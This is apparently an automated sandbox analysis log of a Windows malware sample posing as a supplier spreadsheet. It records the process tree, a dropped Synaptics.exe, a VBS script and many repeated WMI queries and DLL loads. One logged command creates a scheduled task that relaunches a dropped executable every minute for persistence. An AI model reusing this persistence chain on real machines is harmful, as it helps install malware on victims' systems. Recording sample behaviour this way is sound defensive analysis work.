                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | File read: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: Supplier 0202AW-PER2 Sheet.exe | Virustotal: Detection: 84%
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | File read: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                Source: unknown | Process created: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe "C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe"
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | Process created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe"
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs
                                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                Source: unknown | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800
                                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
